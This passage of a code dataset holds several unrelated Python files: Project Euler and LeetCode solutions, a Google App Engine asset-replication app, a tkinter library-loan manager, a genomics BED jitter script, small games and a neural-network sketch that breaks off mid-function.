(1,2,...,k,k+1)\r\n\r\ndef lcmList(inputList):\r\n total = 1\r\n for l in inputList:\r\n total = (total*l)//(math.gcd(total,l))\r\n return total\r\n\r\ndef secondtry(a,N):\r\n # Number of elements below N which have streak a consist of all elements congruent to 1 mod lcm(1,2,3,...,a) without all elements congruent to 1 mod lcm(1,2,...,a,a+1)\r\n # There are 1+(N-1)//lcm(...a) such of the first (assuming a is not 1, in which case it's actually N-1) and 1+(N-1)//lcm(...a+1) of the second.\r\n # We avoid the issue with first=1 by subtracting off an additional 1 from N. Since the lcms never divide 4^n-2 except in very small cases we're trying to fix, things work out.\r\n first = lcmList([x for x in range(1,a+1)])\r\n second = (first * (a+1))//math.gcd(first,a+1)\r\n answer = (N-2)//first - (N-2)//second\r\n return answer\r\n\r\ndef problem601(upper):\r\n final = 0\r\n for i in range(1,upper+1):\r\n final += secondtry(i,4**i)\r\n return final\r\n\r\nprint(problem601(31))\r\n","sub_path":"601.py","file_name":"601.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"289512594","text":"import googlechart as gc\n\nimport logging\nimport cgi\nimport os\nimport datetime as dt\nfrom xml.dom import minidom\n\nfrom google.appengine.api import users\nfrom google.appengine.api import urlfetch\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext import db\n\nBASE_CODES = ('TLT','SPY','EEM','USO','GLD')\nDATE_FORMAT = '%d/%m/%y'\n\nclass RunLogs(db.Model):\n runner = db.UserProperty()\n asset_code = db.StringProperty()\n query_path = db.LinkProperty()\n bquery_path = db.LinkProperty()\n holding_path = db.LinkProperty()\n backtest_path = db.LinkProperty()\n run_time = db.DateTimeProperty() \n\nclass MainPage(webapp.RequestHandler):\n def get(self):\n\n runlogs_query = RunLogs.all().order('-run_time')\n runlogs = runlogs_query.fetch(10)\n\n if users.get_current_user():\n url = users.create_logout_url(self.request.uri)\n url_linktext = 'Logout'\n else:\n url = users.create_login_url(self.request.uri)\n url_linktext = 'Login'\n\n template_values = {\n 'runlogs': runlogs,\n 'url': url,\n 'url_linktext': url_linktext,\n }\n\n path = os.path.join(os.path.dirname(__file__), 'index.html')\n self.response.out.write(template.render(path, template_values))\n\nclass Replicate(webapp.RequestHandler):\n def post(self):\n runlog = RunLogs()\n\n if users.get_current_user():\n runlog.runner = users.get_current_user()\n\n asset_code = self.request.get('asset_code')\n\n today = dt.datetime.now()\n end_date = today.strftime(DATE_FORMAT)\n start_year = today.year\n start_month = today.month - 1\n start_day = today.day\n if today.month == 1:\n start_year = today.year - 1\n start_month = 12\n start_date = dt.date(start_year, start_month, start_day).strftime(DATE_FORMAT)\n\n lb = []\n ub = []\n for item in BASE_CODES:\n lb.append(0.0)\n ub.append(1.0)\n\n urlstring = 'http://al8tross.appspot.com/resources/AssetReplicatorREST?' + \\\n 'targetAsset=' + asset_code + '&' + \\\n 'baseAssets=' + \",\".join(BASE_CODES) + '&' + \\\n 'startDate=' + start_date + '&endDate=' + end_date + '&' + \\\n 'lowerbound=' + \",\".join(map(str, lb)) + '&' + \\\n 'upperbound=' + \",\".join(map(str, ub)) + '&' + \\\n 'periodicity=d&global=true&targetDim=' + str(len(BASE_CODES))\n\n #optimized = urllib.urlopen(urlstring)\n optimized = urlfetch.fetch(urlstring, deadline=10)\n \n optimized_parsed = minidom.parseString(optimized.content)\n codeList = optimized_parsed.getElementsByTagName(\"code\")\n weightList = optimized_parsed.getElementsByTagName(\"weight\")\n codes = []\n weights = []\n for code in codeList:\n codes.append(code.firstChild.data)\n\n for weight in weightList:\n weights.append(float(weight.firstChild.data))\n\n urlpath = gc.bar_chart(weights, codes)\n\n backtesturl = 'http://al8tross.appspot.com/resources/BacktestREST?' + \\\n 'stockCodes='+ asset_code + ',' + ','.join(BASE_CODES) + '&' + \\\n 'factorCodes=' + asset_code + '&' + \\\n 'targetModels=Weighted_Basket_0_' + '_'.join(map(str, weights)) + '&' + \\\n 'meanTarget=0&varTarget=0&skewTarget=0&' + \\\n 'startDate=' + start_date + '&endDate=' + end_date + '&' + \\\n 'nb_read=1&nb_bch=0&' + \\\n 'lowerbound=' + '0,' + ','.join(map(str, lb)) + '&' + \\\n 'upperbound=' + '1,' + ','.join(map(str, ub)) + '&' + \\\n 'periodicity=d'\n\n backtested = urlfetch.fetch(backtesturl, deadline=10)\n\n backtest_parsed = minidom.parseString(backtested.content)\n rowList = backtest_parsed.getElementsByTagName(\"row\")\n dataList = backtest_parsed.getElementsByTagName(\"data\")\n timeseries = [[0.0 for row in range(len(rowList) + 1)] for col in range(2)]\n timeseries[0][0] = 100\n timeseries[1][0] = 100\n for i in range(len(rowList)):\n timeseries[0][i + 1] = timeseries[0][i] * (1 + float(dataList.item(i * 2).firstChild.data))\n timeseries[1][i + 1] = timeseries[1][i] * (1 + float(dataList.item(i * 2 + 1).firstChild.data))\n\n backtestpath = gc.line_chart(timeseries, [asset_code, \"Basket\"])\n\n runlog.asset_code = asset_code\n runlog.query_path = db.Link(urlstring)\n runlog.bquery_path = db.Link(backtesturl)\n runlog.holding_path = db.Link(urlpath)\n runlog.backtest_path = db.Link(backtestpath)\n runlog.run_time = dt.datetime.now()\n\n runlog.put()\n\n self.redirect('/')\n\ndef main():\n logging.getLogger().setLevel(logging.INFO)\n application = webapp.WSGIApplication([('/', MainPage), ('/replicate', Replicate)], debug=True)\n run_wsgi_app(application)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"mainscript.py","file_name":"mainscript.py","file_ext":"py","file_size_in_byte":5217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"266176000","text":"import tkinter as tk\nimport pandas as pd\nimport os\nfrom treview import treview\nimport initizializers as init\nimport SearchInRepo as search\nimport datetime\nimport numpy as np\n#from initizializers import dataframe\n\ndef add_book(dataframe, dataframeLoan, variableString, filenameREPO):\n \n book_to_append = {}\n for key, value in variableString.items():\n book_to_append[key] = [value.get()]\n if key == init.SpecialVar[\"Title\"]:\n SpecialVarTitle = value.get()\n if key == init.SpecialVar[\"Author\"]: \n SpecialVarAuthor = value.get()\n if key == init.SpecialVar[\"Position\"]:\n SpecialVarPos = value.get()\n if key == \"Available\":\n book_to_append[key] = \"Yes\"\n \n \n if not init.dataframe[init.dataframe[init.SpecialVar[\"Position\"]].isin([SpecialVarPos])].empty :\n init.warning(\"There is already a book in that position.\\nIt's impossible that two book are in the same place.\\nMaybe you missed something?\")\n return None\n voidTesT = [values == [\"\"] for values in book_to_append.values()]\n if all(voidTesT):\n message = \"The fields cannot be all empty!!!\"\n init.warning(message)\n else:\n if SpecialVarTitle == \"\" and SpecialVarAuthor == \"\" and SpecialVarPos == \"\":\n message = \"You must add at least Title, Author and Position!!!\"\n init.warning(message)\n return None\n \n with open(filenameREPO, 'w', encoding = \"latin1\" ) as f:\n book_to_append = pd.DataFrame(book_to_append).dropna()\n dataframe = dataframe.append(book_to_append)\n dataframe = dataframe.astype(str)\n dataframe.to_csv(f, sep = \";\", index = False)\n \n with open(filenameREPO, 'r') as f:\n dataframe=pd.read_csv(filenameREPO, sep = \";\", encoding = \"latin1\")\n dataframe = dataframe.replace(np.nan, '', regex=True)\n dataframe = dataframe.astype(str)\n dataframe = dataframe.replace(np.nan, '', regex=True)\n \n init.dataframe = dataframe \ndef explore_repository(dataframe, variableString):\n \n TextWin = tk.Toplevel()\n TextWin.title(\"REPOSITORY RM MEXICO\")\n n_rows =1\n n_columns =1\n for i in range(n_rows):\n TextWin.grid_rowconfigure(i, weight =1)\n for i in range(n_columns):\n TextWin.grid_columnconfigure(i, weight =1)\n treview(TextWin, dataframe, variableString, 0,0,20,20)\n\ndef explore_loan_repository(dataframeLoan, StringOfRestitution):\n \n TextWin = tk.Toplevel()\n TextWin.title(\"REPOSITORY RM MEXICO\")\n treview(TextWin, dataframeLoan, StringOfRestitution,0,0,20,20)\n\n\ndef eliminateBook(dataframe, filenameREPO,variableString):\n \n for key, value in variableString.items():\n if key == init.SpecialVar[\"Position\"]:\n position = value.get()\n found_book = init.dataframe[init.dataframe[key]==position]\n \n init.dataframe = init.dataframe.drop(labels=found_book.index, axis=0)\n with open(filenameREPO, 'w', encoding = \"latin1\" ) as f:\n init.dataframe.to_csv(f, sep = \";\", index = False)\n \n\ndef loan_id_insert(dataframe, dataframeLoan, variableString,filenameREPO, filenameLOAN): \n \n for key, value in variableString.items():\n if key == init.SpecialVar[\"Position\"]:\n position = value.get()\n found_book = dataframe[dataframe[key]==position]\n message =\"\"\n for i in [init.SpecialVar[\"Title\"], init.SpecialVar[\"Author\"], init.SpecialVar[\"Position\"]]:\n message += str(dataframe[i].iloc[0]) + \" \"\n #message = found_book.to_string(index=False)\n loanWin = tk.Toplevel()\n loanWin.title(\"Loan\")\n info = tk.Label(loanWin, text = f\"you are loaning the book:\\n{message}\\n Insert the Id of receving\").grid(row=0, column=2,columnspan = 5, sticky = \"WE\", padx=10)\n \n Name = tk.StringVar()\n Room = tk.StringVar()\n Contact = tk.StringVar()\n Day = tk.StringVar()\n Month = tk.StringVar()\n Year = tk.StringVar()\n Day.set(\"DD\")\n Month.set(\"MM\")\n Year.set(datetime.date.today().year)\n n_rows =10\n n_columns =20\n for i in range(n_rows):\n loanWin.grid_rowconfigure(i, weight =1)\n for i in range(n_columns):\n loanWin.grid_columnconfigure(i, weight =1)\n \n name = tk.Label(loanWin, text = \"name and surname\").grid(row=1, column=0,columnspan=2)\n nameF = tk.Entry(loanWin, textvariable = Name).grid(row=1, column=2, columnspan=5, sticky = \"WE\", padx=10)\n\n room = tk.Label(loanWin, text = \"room/adress\").grid(row=2, column=0, columnspan =2)\n roomF = tk.Entry(loanWin, textvariable = Room).grid(row=2, column=2, columnspan=5, sticky = \"WE\", padx=10)\n \n room = tk.Label(loanWin, text = \"Contact\").grid(row=3, column=0, columnspan =2)\n roomF = tk.Entry(loanWin, textvariable = Contact).grid(row=3, column=2, columnspan=5, sticky = \"WE\", padx=10)\n \n dateLab = tk.Label(loanWin, text = \"Date\\nrestitution\").grid(row=4, column=0, columnspan=1, padx=1)\n dateEntry1= tk.Entry(loanWin, textvariable = Day, width=5).grid(row=4, column=2, columnspan =1, sticky = \"WE\", padx=1)\n \n dateLab = tk.Label(loanWin, text = \"-\").grid(row=4, column=4, columnspan = 1,padx=1)\n dateEntry1= tk.Entry(loanWin, textvariable = Month, width=5).grid(row=4, column=4, columnspan = 1, sticky = \"WE\", padx=1)\n \n dateLab = tk.Label(loanWin, text = \"-\").grid(row=4, column=5, columnspan=1, padx=1)\n dateEntry1= tk.Entry(loanWin, textvariable = Year, width=5).grid(row=4, column=6, columnspan=1, sticky = \"WE\", padx=1)\n \n \n take = tk.Button(loanWin, text = \"insert\", command=lambda: loan_the_book(found_book,Name, Room,Contact,Day, Month, Year,loanWin,dataframe, dataframeLoan, variableString, filenameREPO, filenameLOAN)).grid(row = 5,column=1, padx = 10, pady=30, columnspan = 3)\n \ndef loan_the_book(found, Name, Room,Contact, Day, Month, Year,win, dataframe, dataframeLoan, variableString, filenameREPO, filenameLOAN):\n \n nome = Name.get() \n adress = Room.get()\n contact = Contact.get()\n day = Day.get()\n month = Month.get()\n year = Year.get()\n Name.set(\"\")\n Room.set(\"\")\n Day.set(\"DD\")\n Month.set(\"MM\")\n Year.set(\"\")\n today = datetime.date.today()\n \n for column in found.columns:\n if column == init.SpecialVar[\"Title\"]:\n SpecialVarTitle = found[column][found.index]\n if column == init.SpecialVar[\"Author\"]: \n SpecialVarAuthor = found[column][found.index]\n if column == init.SpecialVar[\"Position\"]:\n SpecialVarPos = found[column][found.index]\n today = f\"{today.day}-{today.month}-{today.year}\"\n book_to_append = {\"Keeper\": [nome], \"Adress\": [adress], \"Title\": SpecialVarTitle, \"Author\": SpecialVarAuthor, \"Position\" : SpecialVarPos, \"Contact\": [contact], \"Date of loan\" : [today], \"Date of restitution\" : [day+\"-\"+month+\"-\"+year]}\n \n book_to_append = pd.DataFrame(book_to_append)\n dataframeLoan = dataframeLoan.append(book_to_append)\n dataframeLoan[\"Date of restitution\" ] =pd.to_datetime(dataframeLoan[\"Date of restitution\" ])\n dataframeLoan=dataframeLoan.sort_values(by=\"Date of restitution\", ascending = False) \n with open(filenameLOAN, 'w', encoding = \"latin1\" ) as f:\n dataframeLoan.to_csv(f, sep = \";\", index = False)\n \n \n dataframe[\"Available\"][found.index] = \"No\"\n with open(filenameREPO, 'w', encoding = \"latin1\" ) as f:\n dataframe.to_csv(f, sep = \";\", index = False, encoding = \"latin1\")\n \n with open(filenameLOAN, 'r') as f:\n dataframeLoan = pd.read_csv(f, sep = \";\", encoding = \"latin1\")\n dataframeLoan = dataframeLoan.replace(np.nan, '', regex=True)\n dataframeLoan = dataframeLoan.astype(str) \n \n init.dataframeLoan = dataframeLoan\n win.destroy() \n\ndef restitution_win(dataframeLoan, dataframe, filenameREPO, filenameLOAN, StringOfRestitution): \n \n StringOfRestitution[\"Name\"] = tk.StringVar()\n StringOfRestitution[\"Adress\"]= tk.StringVar()\n StringOfRestitution[\"Title\"]= tk.StringVar()\n StringOfRestitution[\"Author\"] = tk.StringVar()\n StringOfRestitution[\"Position\"]= tk.StringVar()\n \n restWin = tk.Toplevel()\n restWin.iconbitmap('Seminario_RM.ico')\n name = tk.Label(restWin, text = \"name and surname\").grid(row=1, column=0)\n nameF = tk.Entry(restWin, textvariable = StringOfRestitution[\"Name\"] ).grid(row=1, column=1, sticky = \"WE\", padx=10)\n\n room = tk.Label(restWin, text = \"room/adress\").grid(row=2, column=0)\n roomF = tk.Entry(restWin, textvariable = StringOfRestitution[\"Adress\"]).grid(row=2, column=1, sticky = \"WE\", padx=10)\n \n pos = tk.Label(restWin, text = \"Position\").grid(row=3, column=0)\n search_field_position = tk.Entry(restWin, textvariable =StringOfRestitution[\"Position\"]).grid(row=3, column=1, sticky = \"WE\", padx=10)\n\n pos = tk.Label(restWin, text = \"Author\").grid(row=4, column=0)\n search_field_position = tk.Entry(restWin, textvariable =StringOfRestitution[\"Author\"]).grid(row=4, column=1, sticky = \"WE\", padx=10) \n\n title = tk.Label(restWin, text = \"Title\").grid(row=5, column=0)\n search_field_Title = tk.Entry(restWin, textvariable = StringOfRestitution[\"Title\"]).grid(row=5, column=1, sticky = \"WE\", padx=10)\n\n take = tk.Button(restWin, text = \"restitute\", command=lambda: resa(StringOfRestitution,restWin,dataframeLoan,dataframe, filenameREPO, filenameLOAN)).grid(row = 1,column=2)\n\ndef resa(StringOfRestitution,win, dataframeLoan, dataframe, filenameREPO, filenameLOAN, REMOTE = \"No\"):\n \n dfname = search.merging_search(StringOfRestitution[\"Name\"], \"Keeper\", init.dataframeLoan)\n dfroom = search.merging_search(StringOfRestitution[\"Adress\"], \"Adress\", init.dataframeLoan)\n dfposition = search.merging_search(StringOfRestitution[\"Position\"], \"Position\", init.dataframeLoan)\n dfTitle = search.merging_search(StringOfRestitution[\"Title\"], \"Title\", init.dataframeLoan)\n dfAuthor = search.merging_search(StringOfRestitution[\"Author\"], \"Title\", init.dataframeLoan)\n \n Resultsdf = dfTitle[dfTitle.isin(dfroom)].dropna()\n Resultsdf = Resultsdf[Resultsdf.isin(dfposition)].dropna()\n Resultsdf = Resultsdf[Resultsdf.isin(dfname)].dropna()\n \n init.dataframeLoan = init.dataframeLoan.drop(labels=Resultsdf.index, axis=0)\n \n with open(filenameLOAN, 'w', encoding = \"latin1\" ) as f:\n init.dataframeLoan.to_csv(f, sep = \";\", index = False)\n with open(filenameLOAN, 'r') as f:\n dataframeLoan = pd.read_csv(f, sep = \";\", encoding = \"latin1\") \n dataframeLoan = dataframeLoan.replace(np.nan, '', regex=True)\n dataframeLoan = dataframeLoan.astype(str) \n for key, values in init.variableString.items():\n if key == init.SpecialVar[\"Title\"]:\n indexes = dataframe[key]\n \n Index = indexes[indexes == Resultsdf[\"Title\"][Resultsdf.index[0]]].index.tolist() \n dataframe[\"Available\"][Index] = \"Yes\"\n with open(filenameREPO, 'w', encoding = \"latin1\" ) as f:\n dataframe.to_csv(f, sep = \";\", index = False)\n \n init.dataframe = dataframe\n init.dataframeLoan = dataframeLoan\n win.destroy()\n ","sub_path":"ActOnRepo.py","file_name":"ActOnRepo.py","file_ext":"py","file_size_in_byte":11267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"348195321","text":"import sys\n\nBEDFILENAME = sys.argv[1]\r\nOUTPUTFILENAME = sys.argv[2]\nJITTERLIST = []\nfor i in range(3, len(sys.argv)):\n\t# Add each of the remaining arguments to the list of jitter lengths\n\tJITTERLIST.append(int(sys.argv[i]))\r\n\r\ndef jitterBed():\r\n\t# Make jittered versions of each regions for each shift in JITTERLIST\r\n\t# ASSUMES THAT JITTERS WILL NOT GO OFF CHROMOSOME ENDS\r\n\tbedFile = open(BEDFILENAME)\r\n\toutputFile = open(OUTPUTFILENAME, 'w+')\r\n\tfor line in bedFile:\r\n\t\t# Iterate through the regions and make the flanking regions for each\n\t\toutputFile.write(line)\r\n\t\tlineElements = line.strip().split()\r\n\t\tchrom = lineElements[0]\r\n\t\tstart = int(lineElements[1])\r\n\t\tend = int(lineElements[2])\n\t\tfor jitter in JITTERLIST:\n\t\t\t# Iterate through the jitter lengthss and make a new region for each\n\t\t\tearlyJitterStart = start - jitter\n\t\t\tearlyJitterEnd = end - jitter\n\t\t\tlateJitterStart = start + jitter\n\t\t\tlateJitterEnd = end + jitter\n\t\t\toutputFile.write(chrom + \"\\t\" + str(earlyJitterStart) + \"\\t\" + str(earlyJitterEnd) + \"\\n\")\r\n\t\t\toutputFile.write(chrom + \"\\t\" + str(lateJitterStart) + \"\\t\" + str(lateJitterEnd) + \"\\n\")\r\n\tbedFile.close()\r\n\toutputFile.close()\r\n\r\nif __name__==\"__main__\":\r\n\tjitterBed()\n","sub_path":"jitterBed.py","file_name":"jitterBed.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"85408602","text":"'''\nURL: https://leetcode.com/problems/build-an-array-with-stack-operations/\n\nDifficulty: Easy\n\nDescription: Build an Array With Stack Operations\n\nGiven an array target and an integer n. In each iteration, you will read a number from list = {1,2,3..., n}.\n\nBuild the target array using the following operations:\n\nPush: Read a new element from the beginning list, and push it in the array.\nPop: delete the last element of the array.\nIf the target array is already built, stop reading more elements.\nYou are guaranteed that the target array is strictly increasing, only containing numbers between 1 to n inclusive.\n\nReturn the operations to build the target array.\n\nYou are guaranteed that the answer is unique.\n\n \n\nExample 1:\n\nInput: target = [1,3], n = 3\nOutput: [\"Push\",\"Push\",\"Pop\",\"Push\"]\nExplanation: \nRead number 1 and automatically push in the array -> [1]\nRead number 2 and automatically push in the array then Pop it -> [1]\nRead number 3 and automatically push in the array -> [1,3]\nExample 2:\n\nInput: target = [1,2,3], n = 3\nOutput: [\"Push\",\"Push\",\"Push\"]\nExample 3:\n\nInput: target = [1,2], n = 4\nOutput: [\"Push\",\"Push\"]\nExplanation: You only need to read the first 2 numbers and stop.\nExample 4:\n\nInput: target = [2,3,4], n = 4\nOutput: [\"Push\",\"Pop\",\"Push\",\"Push\",\"Push\"]\n \n\nConstraints:\n\n1 <= target.length <= 100\n1 <= target[i] <= 100\n1 <= n <= 100\ntarget is strictly increasing.\n\n'''\n\n\nclass Solution:\n def buildArray(self, target, n):\n output = []\n target_index = 0\n\n for i in range(1, n+1):\n if output == target or target_index >= len(target):\n break\n\n output.append(\"Push\")\n if target[target_index] == i:\n target_index += 1\n else:\n output.append(\"Pop\")\n\n return output\n","sub_path":"1441 Build an Array With Stack Operations.py","file_name":"1441 Build an Array With Stack Operations.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"15713286","text":"# O mesmo professor quer sortear a ordem de apresentação de trabalhos dos alunos. Faça um programa que leia o nome dos quatro alunos e mostre a ordem sorteada\n\nimport random\n\nn1 = str(input('Primeiro aluno\\n'))\nn2 = str(input('Segundo aluno\\n'))\nn3 = str(input('Terceiro aluno\\n'))\nn4 = str(input('Quarto aluno\\n'))\nlista = [n1, n2, n3, n4]\nrandom.shuffle(lista)\nprint('A ordem de apresentação sera')\nprint(lista)\n","sub_path":"aula01/ex14.py","file_name":"ex14.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"575987724","text":"#PY.01.15 Project 8: Tic Tac Toe Game\r\n#Description: It is a 2 player game where X and O are two persons symbols used to fill the board\r\n# If one of the person fills the board in such a way his/her symbol forms a straight line or a\r\n# daigonal he will be the winner\r\n\r\n\r\nboard = [\" \" for i in range(1,10)] #Board with nine spaces\r\n\r\ndef printboard(): # arrangement of board\r\n row1=\"|{}|{}|{}|\".format(board[0],board[1],board[2])\r\n row2=\"|{}|{}|{}|\".format(board[3],board[4],board[5])\r\n row3=\"|{}|{}|{}|\".format(board[6],board[7],board[8])\r\n\r\n print()\r\n print(row1)\r\n print(row2)\r\n print(row3)\r\n print()\r\n\r\ndef player_move(symbol):\r\n\r\n \r\n print(\"your turn player{}\".format(symbol))\r\n \r\n choice = int(input(\"Enter your choice from (1-9): \").strip()) # Input to give the position to enter the symbol \r\n if board[choice-1] == \" \":\r\n board[choice-1] = symbol\r\n else:\r\n print()\r\n print(\"already filled\") # if space is already used\r\n\r\ndef win(symbol): # checks for the sides and diagonals for the win case\r\n if(board[0] == symbol and board[1] == symbol and board[2] == symbol)or\\\r\n (board[3] == symbol and board[4] == symbol and board[5] == symbol)or\\\r\n (board[6] == symbol and board[7] == symbol and board[8] == symbol)or\\\r\n (board[0] == symbol and board[4] == symbol and board[8] == symbol)or\\\r\n (board[2] == symbol and board[4] == symbol and board[6] == symbol)or\\\r\n (board[0] == symbol and board[3] == symbol and board[6] == symbol)or\\\r\n (board[1] == symbol and board[4] == symbol and board[7] == symbol)or\\\r\n (board[2] == symbol and board[5] == symbol and board[8] == symbol):\r\n print(\"{} wins !!!\".format(symbol))\r\n return True\r\n else:\r\n return False\r\ndef draw(): #if no space is remaining and the win not happens then it is a draw\r\n if \" \" not in board:\r\n return True\r\n else:\r\n return False\r\n \r\n \r\n \r\nwhile True: # used to print the table frequently\r\n printboard()\r\n player_move(\"X\") # Gives chance to X\r\n printboard() # prints the board with X input position\r\n if win(\"X\"): # checks for win\r\n break #If win happens the loop breaks\r\n elif draw(): # else draw\r\n print(\"Its a draw\")\r\n break\r\n player_move(\"O\") #same as above with O\r\n if win(\"O\"):\r\n break\r\n elif draw():\r\n print(\"Its a draw\")\r\n break\r\n \r\n \r\n","sub_path":"TicTacToe_Game.py","file_name":"TicTacToe_Game.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"45689904","text":"\"\"\"\nProject Euler Problem 62\n========================\n\nThe cube, 41063625 (345^3), can be permuted to produce two other cubes:\n56623104 (384^3) and 66430125 (405^3). In fact, 41063625 is the smallest\ncube which has exactly three permutations of its digits which are also\ncube.\n\nFind the smallest cube for which exactly five permutations of its digits\nare cube.\n\"\"\"\n\ndef numToList(n):\n \"\"\" Takes a number and returns a sorted list. \"\"\"\n return tuple(sorted(map(int,list(str(n)))))\n\n\"\"\"\n Use the sorted digits of a cube as a key and store a list of numbers that\n contain these digits.\n\"\"\"\n\ndef solve():\n d = dict()\n n = 1\n while True:\n temp = n**3\n key = numToList(temp)\n d.setdefault(key, []).append(temp)\n\n if len(d[key]) == 5:\n return min(d[key])\n n += 1\n\nprint(solve())\n\n\n","sub_path":"euler-py/062.py","file_name":"062.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"488286119","text":"import pygame\nimport time\n\npygame.font.init()\nscreen = pygame.display.set_mode((800,600))\nbackground = (0, 0, 0)\nscreen.fill((background))\nmyfont = pygame.font.Font(None, 90)\nf = open(\"/home/les/text.txt\",\"r\")\nfor line in f:\n for word in line.split():\n text = myfont.render(word,1,(0,255,0))\n screen.blit(text, (300,300))\n pygame.display.update()\n time.sleep(0.2)\n screen.fill((background))\n pygame.display.update()\npygame.display.quit()\n","sub_path":"speed-reader.py","file_name":"speed-reader.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"357270559","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Import numerics libraries\nimport numpy as np\n\n# Import required custom routines\nfrom IndividualAnalysis import individualClusterProperties, _extractNonStraddling\nfrom AverageAnalysis import averageClusterProperties\nfrom sgolay2D import sgolay2d\nfrom extractClusterCoordinates import extractClusterCoordinates\nfrom paramSpace import simParams_dict, directory_dict\n\n# Set up reference to working dir \nfrom os import chdir\nfrom os.path import join as pathJoin\nchdir(directory_dict[\"root\"])\ndataDir = directory_dict[\"data\"]\noutputDir = directory_dict[\"output\"]\n\ndef main(threshold, timeArray, firstFileId=0, lastFileId=100, stride=1):\n T = timeArray\n maxFileId = len(T)-1\n\n assert (0 <= firstFileId <= maxFileId), \"(0 <= firstFileId <= maxFileId) not satisfied\"\n assert (firstFileId <= lastFileId <= maxFileId), \"(firstFileId <= lastFileId <= maxFileId) not satisfied\"\n assert (0.0 < threshold < 1.0), \"Threshold must be within (0,1)\"\n\n\n #Detect initial coordinates; will be updated\n #Output of extractClusterCoordinates() has format: [(X1, Y1, True/False), ...]\n capacity = simParams_dict[\"capacity\"]\n firstS = np.load( pathJoin(dataDir, \"sSplit/{}-configS_2D.dat.npy\".format(firstFileId)))\n firstS = sgolay2d(firstS / capacity, 17, 5)\n prevCoordinates = extractClusterCoordinates(firstS, threshold)\n\n #Initialize output NumPy\n #First column: time (hr);\n #Other columns cluster: occupancy (in units of \"capacity\")\n timeIndexObj = range(firstFileId, lastFileId, stride)\n rOccupancy = np.zeros(shape=(len(timeIndexObj), len(prevCoordinates)+1), dtype=np.float32)\n rOccupancy[:,-1] = T[timeIndexObj]\n sOccupancy = np.copy(rOccupancy)\n\n #Initialize output DataFrame for average properties\n \n\n ''' Main execution double loop '''\n for timeIndex in timeIndexObj:\n R = np.load( pathJoin(dataDir, \"rSplit/{}-configR_2D.dat.npy\".format(timeIndex)) )/capacity\n S = np.load( pathJoin(dataDir, \"sSplit/{}-configS_2D.dat.npy\".format(timeIndex)) )/capacity\n filtered_S = sgolay2d(S, 17, 5)\n \n currentCoordinates = extractClusterCoordinates(filtered_S, threshold)\n \n individualClusterProperties(R, S, T, timeIndex, \n prevCoordinates, currentCoordinates,\n rOccupancy, sOccupancy)\n \n averageClusterProperties(R, S, T, timeIndex, currentCoordinates)\n\n ''' Save analysis results to file '''\n np.save( pathJoin(outputDir, \"rOccupancy.npy\"), rOccupancy, fix_imports=False )\n np.save( pathJoin(outputDir, \"sOccupancy.npy\"), sOccupancy, fix_imports=False )\n return (rOccupancy, sOccupancy)\n\nif __name__ == \"__main__\": \n T = np.loadtxt(pathJoin(dataDir,\"raw/time_2D.dat\"), dtype=np.float32)\n T = T/3600 \n r,s = main(threshold=0.1, timeArray=T, firstFileId=0, lastFileId=9, stride=1)","sub_path":"src/singleClusterTrack/singleClusterFluctuations.py","file_name":"singleClusterFluctuations.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"168805212","text":"import random\n\nimport numpy as np\n\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n\ndef deriv_sigmoid(x):\n fx = sigmoid(x)\n return fx * (1 - fx)\n\n\ndef mse_loss(y_true, y_pred):\n return ((y_true - y_pred) ** 2).mean()\n\n\nclass Neuron:\n def __init__(self, weights, bias):\n self.weights = weights\n self.bias = bias\n\n def feedforward(self, inputs):\n total = np.dot(self.weights, inputs) + self.bias\n return sigmoid(total)\n\n\nclass NeuralNetwork:\n\n def __init__(self):\n self.weights = np.random.normal(0, 1, 12)\n self.bias = np.random.normal(0, 1, 3)\n\n def func1(self, x):\n return self.weights[0] * x[0] + self.weights[1] * x[1] + self.weights[2] * x[2] + self.weights[3] * x[3] + \\\n self.weights[4] * x[4] + self.bias[0]\n\n def func2(self, x):\n return self.weights[5] * x[0] + self.weights[6] * x[1] + self.weights[7] * x[2] + self.weights[8] * x[3] + \\\n self.weights[9] * x[4] + self.bias[1]\n\n def feedforward(self, x):\n h1 = sigmoid(self.func1(x))\n h2 = sigmoid(self.func2(x))\n o1 = sigmoid(self.weights[10] * h1 + self.weights[11] * h2 + self.bias[2])\n return o1\n\n def train(self, data, all_y_trues):\n\n learn_rate = 0.1\n epochs = 1000\n\n for epoch in range(epochs):\n for x, y_true in zip(data, all_y_trues):\n sum_h1 = self.func1(x)\n h1 = sigmoid(sum_h1)\n\n sum_h2 = self.func2(x)\n h2 = sigmoid(sum_h2)\n\n sum_o1 = self.weights[10] * h1 + self.weights[11] * h2 + self.bias[2]\n o1 = sigmoid(sum_o1)\n y_pred = o1\n\n d_L_d_ypred = -2 * (y_true - y_pred)\n\n d_ypred_d_w5 = h1 * deriv_sigmoid(sum_o1)\n d_ypred_d_w6 = h2 * deriv_sigmoid(sum_o1)\n d_ypred_d_b3 = deriv_sigmoid(sum_o1)\n\n d_ypred_d_h1 = self.weights[4] * deriv_sigmoid(sum_o1)\n d_ypred_d_h2 = self.weights[5] * deriv_sigmoid(sum_o1)\n\n 